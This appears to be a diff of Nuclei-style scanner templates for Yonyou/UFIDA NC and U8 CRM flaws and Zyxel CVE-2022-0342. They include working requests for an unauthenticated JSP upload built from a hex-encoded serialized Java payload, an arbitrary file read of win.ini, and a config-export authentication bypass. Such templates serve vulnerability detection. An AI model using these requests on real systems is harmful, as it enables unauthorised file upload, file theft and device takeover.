http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-fileupload..yaml Executable file
View File

@ -0,0 +1,41 @@
id: yonyou-nc-filereceiveservlet-fileupload
info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
author: bjxsec
severity: critical
description: |
An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
metadata:
max-request: 1
fofa-query: app="用友-UFIDA-NC"
verified: true
tags: yonyou,nc,fileupload,intrusive
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
file_content: "{{randstr}}"
http:
- raw:
- |
POST /servlet/FileReceiveServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;
{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
- |
GET /{{file_name}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, '{{file_content}}')"
condition: and

16
http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml → http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
View File

@ -1,13 +1,19 @@
id: yonyou-nc-grouptemplet-file-upload
id: yonyou-nc-grouptemplet-fileupload
info:
name: yonyou-nc-grouptemplet-file-upload
name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload
author: SleepingBag945
severity: critical
description: 用友NC任意文件上传
description: |
The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files.
reference:
- https://www.seebug.org/vuldb/ssvid-99547
tags: yonyou
- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
metadata:
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
tags: yonyou,nc,intrusive
variables:
v1: "{{rand_int(1,100)}}"
@ -29,7 +35,7 @@ http:
- |
GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl

26
http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
View File

File diff suppressed because one or more lines are too long

23
http/vulnerabilities/yonyou/yonyou-u8-crm-getemaildata-file-read.yaml
View File

@ -1,23 +0,0 @@
id: yonyou-u8-crm-getemaildata-file-read
info:
name: 用友U8-CRM getemaildata 任意文件读取
author: SleepingBag945
severity: high
description: |
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件读取漏洞
metadata:
tags: yonyou
http:
- raw:
- |
POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,"for 16-bit app support")
condition: and

29
http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml Normal file
View File

@ -0,0 +1,29 @@
id: yonyou-u8-crm-lfi
info:
name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file reading vulnerability in getemaildata.php of UFIDA U8 CRM customer relationship management system. An attacker can obtain sensitive files in the server through the vulnerability.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
fofa-query: body="用友U8CRM"
verified: true
tags: yonyou,u8-crm,lfi
http:
- raw:
- |
POST /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'contains(body_1,"bit app support") && contains(body_1,"extensions") && contains(body_1,"fonts")'
condition: and

41
http/vulnerabilities/zyxel/CVE-2022-0342.yaml
View File

@ -1,41 +0,0 @@
id: CVE-2022-0342
info:
name: CVE-2022-0342 Zyxel Authentication Bypass
author: SleepingBag945
severity: critical
description: Zyxel USG/ZyWALL是中国合勤科技Zyxel公司的一款防火墙。ZyWALL 4.20版本至4.70版本、USG FLEX 4.50版本至5.20版本、ATP 4.32版本至5.20版本、VPN 4.30版本至5.20版本、NSG 1.20版本至1.33 Patch 4版本存在安全漏洞攻击者利用该漏洞绕过Web身份验证并获得设备的管理访问权限。
tags: zyxel
http:
- raw:
- |
GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "interface-name"
condition: and
- type: word
words:
- "text/zyxel"
part: header
condition: and
- type: status
status:
- 200
# https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/